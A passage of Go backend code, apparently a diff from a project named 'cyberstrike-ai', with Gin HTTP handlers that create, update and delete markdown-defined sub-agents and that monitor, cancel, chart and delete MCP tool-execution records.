if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
b, err := os.ReadFile(path)
|
||||
if err != nil {
|
||||
if os.IsNotExist(err) {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "文件不存在"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
sub, err := agents.ParseMarkdownSubAgent(filename, string(b))
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
isOrch := agents.IsOrchestratorLikeMarkdown(filename, sub.Kind)
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"filename": filename,
|
||||
"raw": string(b),
|
||||
"id": sub.ID,
|
||||
"name": sub.Name,
|
||||
"description": sub.Description,
|
||||
"tools": sub.RoleTools,
|
||||
"instruction": sub.Instruction,
|
||||
"bind_role": sub.BindRole,
|
||||
"max_iterations": sub.MaxIterations,
|
||||
"kind": sub.Kind,
|
||||
"is_orchestrator": isOrch,
|
||||
})
|
||||
}
|
||||
|
||||
type markdownAgentBody struct {
|
||||
Filename string `json:"filename"`
|
||||
ID string `json:"id"`
|
||||
Name string `json:"name"`
|
||||
Description string `json:"description"`
|
||||
Tools []string `json:"tools"`
|
||||
Instruction string `json:"instruction"`
|
||||
BindRole string `json:"bind_role"`
|
||||
MaxIterations int `json:"max_iterations"`
|
||||
Kind string `json:"kind"`
|
||||
Raw string `json:"raw"`
|
||||
}
|
||||
|
||||
// CreateMarkdownAgent POST /api/multi-agent/markdown-agents
|
||||
func (h *MarkdownAgentsHandler) CreateMarkdownAgent(c *gin.Context) {
|
||||
if h.dir == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "未配置 agents 目录"})
|
||||
return
|
||||
}
|
||||
var body markdownAgentBody
|
||||
if err := c.ShouldBindJSON(&body); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
filename := strings.TrimSpace(body.Filename)
|
||||
if filename == "" {
|
||||
if strings.EqualFold(strings.TrimSpace(body.Kind), "orchestrator") {
|
||||
filename = agents.OrchestratorMarkdownFilename
|
||||
} else {
|
||||
base := agents.SlugID(body.Name)
|
||||
if base == "" {
|
||||
base = "agent"
|
||||
}
|
||||
filename = base + ".md"
|
||||
}
|
||||
}
|
||||
path, err := h.safeJoin(filename)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if _, err := os.Stat(path); err == nil {
|
||||
c.JSON(http.StatusConflict, gin.H{"error": "文件已存在"})
|
||||
return
|
||||
}
|
||||
sub := config.MultiAgentSubConfig{
|
||||
ID: strings.TrimSpace(body.ID),
|
||||
Name: strings.TrimSpace(body.Name),
|
||||
Description: strings.TrimSpace(body.Description),
|
||||
Instruction: strings.TrimSpace(body.Instruction),
|
||||
RoleTools: body.Tools,
|
||||
BindRole: strings.TrimSpace(body.BindRole),
|
||||
MaxIterations: body.MaxIterations,
|
||||
Kind: strings.TrimSpace(body.Kind),
|
||||
}
|
||||
base := filepath.Base(path)
|
||||
if (strings.EqualFold(base, agents.OrchestratorMarkdownFilename) ||
|
||||
strings.EqualFold(base, agents.OrchestratorPlanExecuteMarkdownFilename) ||
|
||||
strings.EqualFold(base, agents.OrchestratorSupervisorMarkdownFilename)) && sub.Kind == "" {
|
||||
sub.Kind = "orchestrator"
|
||||
}
|
||||
if sub.ID == "" {
|
||||
sub.ID = agents.SlugID(sub.Name)
|
||||
}
|
||||
if sub.Name == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "name 必填"})
|
||||
return
|
||||
}
|
||||
var out []byte
|
||||
if strings.TrimSpace(body.Raw) != "" {
|
||||
out = []byte(body.Raw)
|
||||
} else {
|
||||
out, err = agents.BuildMarkdownFile(sub)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
}
|
||||
if want := agents.WantsMarkdownOrchestrator(filepath.Base(path), body.Kind, string(out)); want {
|
||||
other, oerr := existingOtherOrchestrator(h.dir, filepath.Base(path))
|
||||
if oerr != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": oerr.Error()})
|
||||
return
|
||||
}
|
||||
if other != "" {
|
||||
c.JSON(http.StatusConflict, gin.H{"error": fmt.Sprintf("已存在主代理定义:%s,请先删除或取消其主代理标记", other)})
|
||||
return
|
||||
}
|
||||
}
|
||||
if err := os.MkdirAll(h.dir, 0755); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if err := os.WriteFile(path, out, 0644); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "agent", "markdown_create", "创建 Markdown 子代理", "markdown_agent", filepath.Base(path), nil)
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"filename": filepath.Base(path), "message": "已创建"})
|
||||
}
|
||||
|
||||
// UpdateMarkdownAgent PUT /api/multi-agent/markdown-agents/:filename
|
||||
func (h *MarkdownAgentsHandler) UpdateMarkdownAgent(c *gin.Context) {
|
||||
filename := c.Param("filename")
|
||||
path, err := h.safeJoin(filename)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
var body markdownAgentBody
|
||||
if err := c.ShouldBindJSON(&body); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
sub := config.MultiAgentSubConfig{
|
||||
ID: strings.TrimSpace(body.ID),
|
||||
Name: strings.TrimSpace(body.Name),
|
||||
Description: strings.TrimSpace(body.Description),
|
||||
Instruction: strings.TrimSpace(body.Instruction),
|
||||
RoleTools: body.Tools,
|
||||
BindRole: strings.TrimSpace(body.BindRole),
|
||||
MaxIterations: body.MaxIterations,
|
||||
Kind: strings.TrimSpace(body.Kind),
|
||||
}
|
||||
if (strings.EqualFold(filename, agents.OrchestratorMarkdownFilename) ||
|
||||
strings.EqualFold(filename, agents.OrchestratorPlanExecuteMarkdownFilename) ||
|
||||
strings.EqualFold(filename, agents.OrchestratorSupervisorMarkdownFilename)) && sub.Kind == "" {
|
||||
sub.Kind = "orchestrator"
|
||||
}
|
||||
if sub.Name == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "name 必填"})
|
||||
return
|
||||
}
|
||||
if sub.ID == "" {
|
||||
sub.ID = agents.SlugID(sub.Name)
|
||||
}
|
||||
var out []byte
|
||||
if strings.TrimSpace(body.Raw) != "" {
|
||||
out = []byte(body.Raw)
|
||||
} else {
|
||||
out, err = agents.BuildMarkdownFile(sub)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
}
|
||||
if want := agents.WantsMarkdownOrchestrator(filename, body.Kind, string(out)); want {
|
||||
other, oerr := existingOtherOrchestrator(h.dir, filename)
|
||||
if oerr != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": oerr.Error()})
|
||||
return
|
||||
}
|
||||
if other != "" {
|
||||
c.JSON(http.StatusConflict, gin.H{"error": fmt.Sprintf("已存在主代理定义:%s,请先删除或取消其主代理标记", other)})
|
||||
return
|
||||
}
|
||||
}
|
||||
if err := os.WriteFile(path, out, 0644); err != nil {
|
||||
if os.IsNotExist(err) {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "文件不存在"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "agent", "markdown_update", "更新 Markdown 子代理", "markdown_agent", filename, nil)
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"message": "已保存"})
|
||||
}
|
||||
|
||||
// DeleteMarkdownAgent DELETE /api/multi-agent/markdown-agents/:filename
|
||||
func (h *MarkdownAgentsHandler) DeleteMarkdownAgent(c *gin.Context) {
|
||||
filename := c.Param("filename")
|
||||
path, err := h.safeJoin(filename)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if err := os.Remove(path); err != nil {
|
||||
if os.IsNotExist(err) {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "文件不存在"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "agent", "markdown_delete", "删除 Markdown 子代理", "markdown_agent", filename, nil)
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"message": "已删除"})
|
||||
}
|
||||
@@ -0,0 +1,618 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"io"
|
||||
"net/http"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/audit"
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/security"
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// MonitorHandler 监控处理器
|
||||
type MonitorHandler struct {
|
||||
mcpServer *mcp.Server
|
||||
externalMCPMgr *mcp.ExternalMCPManager
|
||||
executor *security.Executor
|
||||
db *database.DB
|
||||
logger *zap.Logger
|
||||
audit *audit.Service
|
||||
}
|
||||
|
||||
// SetAudit wires platform audit logging.
|
||||
func (h *MonitorHandler) SetAudit(s *audit.Service) {
|
||||
h.audit = s
|
||||
}
|
||||
|
||||
// NewMonitorHandler 创建新的监控处理器
|
||||
func NewMonitorHandler(mcpServer *mcp.Server, executor *security.Executor, db *database.DB, logger *zap.Logger) *MonitorHandler {
|
||||
return &MonitorHandler{
|
||||
mcpServer: mcpServer,
|
||||
externalMCPMgr: nil, // 将在创建后设置
|
||||
executor: executor,
|
||||
db: db,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
// SetExternalMCPManager 设置外部MCP管理器
|
||||
func (h *MonitorHandler) SetExternalMCPManager(mgr *mcp.ExternalMCPManager) {
|
||||
h.externalMCPMgr = mgr
|
||||
}
|
||||
|
||||
// MonitorResponse 监控响应
|
||||
type MonitorResponse struct {
|
||||
Executions []*mcp.ToolExecution `json:"executions"`
|
||||
Stats map[string]*mcp.ToolStats `json:"stats"`
|
||||
Timestamp time.Time `json:"timestamp"`
|
||||
Total int `json:"total,omitempty"`
|
||||
Page int `json:"page,omitempty"`
|
||||
PageSize int `json:"page_size,omitempty"`
|
||||
TotalPages int `json:"total_pages,omitempty"`
|
||||
}
|
||||
|
||||
// Monitor 获取监控信息
|
||||
func (h *MonitorHandler) Monitor(c *gin.Context) {
|
||||
// 解析分页参数
|
||||
page := 1
|
||||
pageSize := 20
|
||||
if pageStr := c.Query("page"); pageStr != "" {
|
||||
if p, err := strconv.Atoi(pageStr); err == nil && p > 0 {
|
||||
page = p
|
||||
}
|
||||
}
|
||||
if pageSizeStr := c.Query("page_size"); pageSizeStr != "" {
|
||||
if ps, err := strconv.Atoi(pageSizeStr); err == nil && ps > 0 && ps <= 100 {
|
||||
pageSize = ps
|
||||
}
|
||||
}
|
||||
|
||||
// 解析状态筛选参数
|
||||
status := c.Query("status")
|
||||
// 解析工具筛选参数(兼容 mcp__tool 与内部 mcp::tool)
|
||||
toolName := normalizeToolNameFilter(c.Query("tool"))
|
||||
|
||||
executions, total := h.loadExecutionsWithPagination(page, pageSize, status, toolName)
|
||||
stats := h.loadStats()
|
||||
|
||||
totalPages := (total + pageSize - 1) / pageSize
|
||||
if totalPages == 0 {
|
||||
totalPages = 1
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, MonitorResponse{
|
||||
Executions: executions,
|
||||
Stats: stats,
|
||||
Timestamp: time.Now(),
|
||||
Total: total,
|
||||
Page: page,
|
||||
PageSize: pageSize,
|
||||
TotalPages: totalPages,
|
||||
})
|
||||
}
|
||||
|
||||
func (h *MonitorHandler) loadExecutions() []*mcp.ToolExecution {
|
||||
executions, _ := h.loadExecutionsWithPagination(1, 1000, "", "")
|
||||
return executions
|
||||
}
|
||||
|
||||
func (h *MonitorHandler) loadExecutionsWithPagination(page, pageSize int, status, toolName string) ([]*mcp.ToolExecution, int) {
|
||||
if h.db == nil {
|
||||
allExecutions := h.mcpServer.GetAllExecutions()
|
||||
// 如果指定了状态筛选或工具筛选,先进行筛选
|
||||
if status != "" || toolName != "" {
|
||||
filtered := make([]*mcp.ToolExecution, 0)
|
||||
for _, exec := range allExecutions {
|
||||
matchStatus := status == "" || exec.Status == status
|
||||
// 支持部分匹配(模糊搜索)
|
||||
matchTool := toolNameFilterMatches(exec.ToolName, toolName)
|
||||
if matchStatus && matchTool {
|
||||
filtered = append(filtered, exec)
|
||||
}
|
||||
}
|
||||
allExecutions = filtered
|
||||
}
|
||||
total := len(allExecutions)
|
||||
offset := (page - 1) * pageSize
|
||||
end := offset + pageSize
|
||||
if end > total {
|
||||
end = total
|
||||
}
|
||||
if offset >= total {
|
||||
return []*mcp.ToolExecution{}, total
|
||||
}
|
||||
return allExecutions[offset:end], total
|
||||
}
|
||||
|
||||
offset := (page - 1) * pageSize
|
||||
executions, err := h.db.LoadToolExecutionsWithPagination(offset, pageSize, status, toolName)
|
||||
if err != nil {
|
||||
h.logger.Warn("从数据库加载执行记录失败,回退到内存数据", zap.Error(err))
|
||||
allExecutions := h.mcpServer.GetAllExecutions()
|
||||
// 如果指定了状态筛选或工具筛选,先进行筛选
|
||||
if status != "" || toolName != "" {
|
||||
filtered := make([]*mcp.ToolExecution, 0)
|
||||
for _, exec := range allExecutions {
|
||||
matchStatus := status == "" || exec.Status == status
|
||||
// 支持部分匹配(模糊搜索)
|
||||
matchTool := toolNameFilterMatches(exec.ToolName, toolName)
|
||||
if matchStatus && matchTool {
|
||||
filtered = append(filtered, exec)
|
||||
}
|
||||
}
|
||||
allExecutions = filtered
|
||||
}
|
||||
total := len(allExecutions)
|
||||
offset := (page - 1) * pageSize
|
||||
end := offset + pageSize
|
||||
if end > total {
|
||||
end = total
|
||||
}
|
||||
if offset >= total {
|
||||
return []*mcp.ToolExecution{}, total
|
||||
}
|
||||
return allExecutions[offset:end], total
|
||||
}
|
||||
|
||||
// 获取总数(考虑状态筛选和工具筛选)
|
||||
total, err := h.db.CountToolExecutions(status, toolName)
|
||||
if err != nil {
|
||||
h.logger.Warn("获取执行记录总数失败", zap.Error(err))
|
||||
// 回退:使用已加载的记录数估算
|
||||
total = offset + len(executions)
|
||||
if len(executions) == pageSize {
|
||||
total = offset + len(executions) + 1
|
||||
}
|
||||
}
|
||||
|
||||
return executions, total
|
||||
}
|
||||
|
||||
func (h *MonitorHandler) loadStats() map[string]*mcp.ToolStats {
|
||||
// 合并内部MCP服务器和外部MCP管理器的统计信息
|
||||
stats := make(map[string]*mcp.ToolStats)
|
||||
|
||||
// 加载内部MCP服务器的统计信息
|
||||
if h.db == nil {
|
||||
internalStats := h.mcpServer.GetStats()
|
||||
for k, v := range internalStats {
|
||||
stats[k] = v
|
||||
}
|
||||
} else {
|
||||
dbStats, err := h.db.LoadToolStats()
|
||||
if err != nil {
|
||||
h.logger.Warn("从数据库加载统计信息失败,回退到内存数据", zap.Error(err))
|
||||
internalStats := h.mcpServer.GetStats()
|
||||
for k, v := range internalStats {
|
||||
stats[k] = v
|
||||
}
|
||||
} else {
|
||||
for k, v := range dbStats {
|
||||
stats[k] = v
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 合并外部MCP管理器的统计信息
|
||||
if h.externalMCPMgr != nil {
|
||||
externalStats := h.externalMCPMgr.GetToolStats()
|
||||
for k, v := range externalStats {
|
||||
// 如果已存在,合并统计信息
|
||||
if existing, exists := stats[k]; exists {
|
||||
existing.TotalCalls += v.TotalCalls
|
||||
existing.SuccessCalls += v.SuccessCalls
|
||||
existing.FailedCalls += v.FailedCalls
|
||||
// 使用最新的调用时间
|
||||
if v.LastCallTime != nil && (existing.LastCallTime == nil || v.LastCallTime.After(*existing.LastCallTime)) {
|
||||
existing.LastCallTime = v.LastCallTime
|
||||
}
|
||||
} else {
|
||||
stats[k] = v
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return stats
|
||||
}
|
||||
|
||||
// GetExecution 获取特定执行记录
|
||||
func (h *MonitorHandler) GetExecution(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
// 先从内部MCP服务器查找
|
||||
exec, exists := h.mcpServer.GetExecution(id)
|
||||
if exists {
|
||||
c.JSON(http.StatusOK, exec)
|
||||
return
|
||||
}
|
||||
|
||||
// 如果找不到,尝试从外部MCP管理器查找
|
||||
if h.externalMCPMgr != nil {
|
||||
exec, exists = h.externalMCPMgr.GetExecution(id)
|
||||
if exists {
|
||||
c.JSON(http.StatusOK, exec)
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
// 如果都找不到,尝试从数据库查找(如果使用数据库存储)
|
||||
if h.db != nil {
|
||||
exec, err := h.db.GetToolExecution(id)
|
||||
if err == nil && exec != nil {
|
||||
c.JSON(http.StatusOK, exec)
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "执行记录未找到"})
|
||||
}
|
||||
|
||||
// CancelExecution 手动取消进行中的 MCP 工具调用(仅取消该次 tools/call 的上下文,不停止整条 Agent / 迭代任务)
|
||||
// 请求体可选 JSON:{ "note": "用户说明" },将与工具已返回输出合并交给模型(含「用户终止说明」标题块,与命令行原文区分)。
|
||||
func (h *MonitorHandler) CancelExecution(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
if id == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "执行记录ID不能为空"})
|
||||
return
|
||||
}
|
||||
note := ""
|
||||
dec := json.NewDecoder(c.Request.Body)
|
||||
var body struct {
|
||||
Note string `json:"note"`
|
||||
}
|
||||
if err := dec.Decode(&body); err != nil && !errors.Is(err, io.EOF) {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "请求体须为 JSON,例如 {\"note\":\"说明\"},可为空对象"})
|
||||
return
|
||||
}
|
||||
note = strings.TrimSpace(body.Note)
|
||||
if h.mcpServer.CancelToolExecutionWithNote(id, note) {
|
||||
h.logger.Info("已请求取消 MCP 工具执行", zap.String("executionId", id), zap.String("source", "internal"), zap.Bool("hasNote", note != ""))
|
||||
c.JSON(http.StatusOK, gin.H{"message": "已发送终止信号", "executionId": id})
|
||||
return
|
||||
}
|
||||
if h.externalMCPMgr != nil && h.externalMCPMgr.CancelToolExecutionWithNote(id, note) {
|
||||
h.logger.Info("已请求取消 MCP 工具执行", zap.String("executionId", id), zap.String("source", "external"), zap.Bool("hasNote", note != ""))
|
||||
c.JSON(http.StatusOK, gin.H{"message": "已发送终止信号", "executionId": id})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "未找到进行中的工具执行,或该任务已结束"})
|
||||
}
|
||||
|
||||
// BatchGetToolNames 批量获取工具执行的工具名称(消除前端 N+1 请求)
|
||||
func (h *MonitorHandler) BatchGetToolNames(c *gin.Context) {
|
||||
var req struct {
|
||||
IDs []string `json:"ids"`
|
||||
}
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
result := make(map[string]string, len(req.IDs))
|
||||
for _, id := range req.IDs {
|
||||
// 先从内部MCP服务器查找
|
||||
if exec, exists := h.mcpServer.GetExecution(id); exists {
|
||||
result[id] = exec.ToolName
|
||||
continue
|
||||
}
|
||||
// 再从外部MCP管理器查找
|
||||
if h.externalMCPMgr != nil {
|
||||
if exec, exists := h.externalMCPMgr.GetExecution(id); exists {
|
||||
result[id] = exec.ToolName
|
||||
continue
|
||||
}
|
||||
}
|
||||
// 最后从数据库查找
|
||||
if h.db != nil {
|
||||
if exec, err := h.db.GetToolExecution(id); err == nil && exec != nil {
|
||||
result[id] = exec.ToolName
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, result)
|
||||
}
|
||||
|
||||
// GetStats 获取统计信息
|
||||
func (h *MonitorHandler) GetStats(c *gin.Context) {
|
||||
stats := h.loadStats()
|
||||
c.JSON(http.StatusOK, stats)
|
||||
}
|
||||
|
||||
// CallsTimelinePoint 调用趋势数据点
|
||||
type CallsTimelinePoint struct {
|
||||
T time.Time `json:"t"`
|
||||
Total int `json:"total"`
|
||||
Failed int `json:"failed"`
|
||||
}
|
||||
|
||||
// CallsTimelineSummary 调用趋势汇总
|
||||
type CallsTimelineSummary struct {
|
||||
TotalCalls int `json:"totalCalls"`
|
||||
Peak int `json:"peak"`
|
||||
}
|
||||
|
||||
// CallsTimelineResponse 调用趋势响应
|
||||
type CallsTimelineResponse struct {
|
||||
Range string `json:"range"`
|
||||
Points []CallsTimelinePoint `json:"points"`
|
||||
Summary CallsTimelineSummary `json:"summary"`
|
||||
}
|
||||
|
||||
type callsTimelineConfig struct {
|
||||
rangeKey string
|
||||
duration time.Duration
|
||||
bucketSize time.Duration
|
||||
dailyBuckets bool
|
||||
}
|
||||
|
||||
func parseCallsTimelineRange(raw string) (callsTimelineConfig, bool) {
|
||||
switch strings.TrimSpace(raw) {
|
||||
case "24h":
|
||||
return callsTimelineConfig{rangeKey: "24h", duration: 24 * time.Hour, bucketSize: time.Hour, dailyBuckets: false}, true
|
||||
case "30d":
|
||||
return callsTimelineConfig{rangeKey: "30d", duration: 30 * 24 * time.Hour, bucketSize: 24 * time.Hour, dailyBuckets: true}, true
|
||||
default:
|
||||
return callsTimelineConfig{rangeKey: "7d", duration: 7 * 24 * time.Hour, bucketSize: time.Hour, dailyBuckets: false}, true
|
||||
}
|
||||
}
|
||||
|
||||
func truncateToBucket(t time.Time, bucketSize time.Duration, dailyBuckets bool) time.Time {
|
||||
if dailyBuckets {
|
||||
y, m, d := t.Date()
|
||||
return time.Date(y, m, d, 0, 0, 0, 0, t.Location())
|
||||
}
|
||||
return t.Truncate(bucketSize)
|
||||
}
|
||||
|
||||
func buildCallsTimelinePoints(cfg callsTimelineConfig, buckets map[time.Time]struct{ total, failed int }) []CallsTimelinePoint {
|
||||
now := time.Now()
|
||||
start := truncateToBucket(now.Add(-cfg.duration), cfg.bucketSize, cfg.dailyBuckets)
|
||||
end := truncateToBucket(now, cfg.bucketSize, cfg.dailyBuckets)
|
||||
|
||||
points := make([]CallsTimelinePoint, 0)
|
||||
for current := start; !current.After(end); current = current.Add(cfg.bucketSize) {
|
||||
val := buckets[current]
|
||||
points = append(points, CallsTimelinePoint{
|
||||
T: current,
|
||||
Total: val.total,
|
||||
Failed: val.failed,
|
||||
})
|
||||
}
|
||||
return points
|
||||
}
|
||||
|
||||
func (h *MonitorHandler) loadCallsTimeline(cfg callsTimelineConfig) []CallsTimelinePoint {
|
||||
since := time.Now().Add(-cfg.duration)
|
||||
bucketMap := make(map[time.Time]struct{ total, failed int })
|
||||
|
||||
if h.db != nil {
|
||||
dbBuckets, err := h.db.LoadCallsTimeline(since, cfg.dailyBuckets)
|
||||
if err != nil {
|
||||
h.logger.Warn("从数据库加载调用趋势失败,回退到内存数据", zap.Error(err))
|
||||
} else {
|
||||
for _, b := range dbBuckets {
|
||||
key := truncateToBucket(b.BucketTime, cfg.bucketSize, cfg.dailyBuckets)
|
||||
entry := bucketMap[key]
|
||||
entry.total += b.Total
|
||||
entry.failed += b.Failed
|
||||
bucketMap[key] = entry
|
||||
}
|
||||
return buildCallsTimelinePoints(cfg, bucketMap)
|
||||
}
|
||||
}
|
||||
|
||||
for _, exec := range h.mcpServer.GetAllExecutions() {
|
||||
if exec == nil || exec.StartTime.Before(since) {
|
||||
continue
|
||||
}
|
||||
key := truncateToBucket(exec.StartTime, cfg.bucketSize, cfg.dailyBuckets)
|
||||
entry := bucketMap[key]
|
||||
entry.total++
|
||||
if exec.Status == "failed" || exec.Status == "cancelled" {
|
||||
entry.failed++
|
||||
}
|
||||
bucketMap[key] = entry
|
||||
}
|
||||
return buildCallsTimelinePoints(cfg, bucketMap)
|
||||
}
|
||||
|
||||
// GetCallsTimeline 获取 MCP 工具调用趋势
|
||||
func (h *MonitorHandler) GetCallsTimeline(c *gin.Context) {
|
||||
cfg, _ := parseCallsTimelineRange(c.Query("range"))
|
||||
points := h.loadCallsTimeline(cfg)
|
||||
|
||||
summary := CallsTimelineSummary{}
|
||||
for _, p := range points {
|
||||
summary.TotalCalls += p.Total
|
||||
if p.Total > summary.Peak {
|
||||
summary.Peak = p.Total
|
||||
}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, CallsTimelineResponse{
|
||||
Range: cfg.rangeKey,
|
||||
Points: points,
|
||||
Summary: summary,
|
||||
})
|
||||
}
|
||||
|
||||
// DeleteExecution 删除执行记录
|
||||
func (h *MonitorHandler) DeleteExecution(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
if id == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "执行记录ID不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
// 如果使用数据库,先获取执行记录信息,然后删除并更新统计
|
||||
if h.db != nil {
|
||||
// 先获取执行记录信息(用于更新统计)
|
||||
exec, err := h.db.GetToolExecution(id)
|
||||
if err != nil {
|
||||
// 如果找不到记录,可能已经被删除,直接返回成功
|
||||
h.logger.Warn("执行记录不存在,可能已被删除", zap.String("executionId", id), zap.Error(err))
|
||||
c.JSON(http.StatusOK, gin.H{"message": "执行记录不存在或已被删除"})
|
||||
return
|
||||
}
|
||||
|
||||
// 删除执行记录
|
||||
err = h.db.DeleteToolExecution(id)
|
||||
if err != nil {
|
||||
h.logger.Error("删除执行记录失败", zap.Error(err), zap.String("executionId", id))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "删除执行记录失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 更新统计信息(减少相应的计数)
|
||||
totalCalls := 1
|
||||
successCalls := 0
|
||||
failedCalls := 0
|
||||
if exec.Status == "failed" || exec.Status == "cancelled" {
|
||||
failedCalls = 1
|
||||
} else if exec.Status == "completed" {
|
||||
successCalls = 1
|
||||
}
|
||||
|
||||
if exec.ToolName != "" {
|
||||
if err := h.db.DecreaseToolStats(exec.ToolName, totalCalls, successCalls, failedCalls); err != nil {
|
||||
h.logger.Warn("更新统计信息失败", zap.Error(err), zap.String("toolName", exec.ToolName))
|
||||
// 不返回错误,因为记录已经删除成功
|
||||
}
|
||||
}
|
||||
|
||||
h.logger.Info("执行记录已从数据库删除", zap.String("executionId", id), zap.String("toolName", exec.ToolName))
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "tool", "execution_delete", "删除工具执行记录", "tool_execution", id, map[string]interface{}{
|
||||
"tool_name": exec.ToolName,
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除"})
|
||||
return
|
||||
}
|
||||
|
||||
// 如果不使用数据库,尝试从内存中删除(内部MCP服务器)
|
||||
// 注意:内存中的记录可能已经被清理,所以这里只记录日志
|
||||
h.logger.Info("尝试删除内存中的执行记录", zap.String("executionId", id))
|
||||
c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"})
|
||||
}
|
||||
|
||||
// DeleteExecutions 批量删除执行记录
|
||||
func (h *MonitorHandler) DeleteExecutions(c *gin.Context) {
|
||||
var request struct {
|
||||
IDs []string `json:"ids"`
|
||||
}
|
||||
|
||||
if err := c.ShouldBindJSON(&request); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "请求参数无效: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if len(request.IDs) == 0 {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "执行记录ID列表不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
// 如果使用数据库,先获取执行记录信息,然后删除并更新统计
|
||||
if h.db != nil {
|
||||
// 先获取执行记录信息(用于更新统计)
|
||||
executions, err := h.db.GetToolExecutionsByIds(request.IDs)
|
||||
if err != nil {
|
||||
h.logger.Error("获取执行记录失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "获取执行记录失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 按工具名称分组统计需要减少的数量
|
||||
toolStats := make(map[string]struct {
|
||||
totalCalls int
|
||||
successCalls int
|
||||
failedCalls int
|
||||
})
|
||||
|
||||
for _, exec := range executions {
|
||||
if exec.ToolName == "" {
|
||||
continue
|
||||
}
|
||||
|
||||
stats := toolStats[exec.ToolName]
|
||||
stats.totalCalls++
|
||||
if exec.Status == "failed" || exec.Status == "cancelled" {
|
||||
stats.failedCalls++
|
||||
} else if exec.Status == "completed" {
|
||||
stats.successCalls++
|
||||
}
|
||||
toolStats[exec.ToolName] = stats
|
||||
}
|
||||
|
||||
// 批量删除执行记录
|
||||
err = h.db.DeleteToolExecutions(request.IDs)
|
||||
if err != nil {
|
||||
h.logger.Error("批量删除执行记录失败", zap.Error(err), zap.Int("count", len(request.IDs)))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "批量删除执行记录失败: " + err.Error()})
|
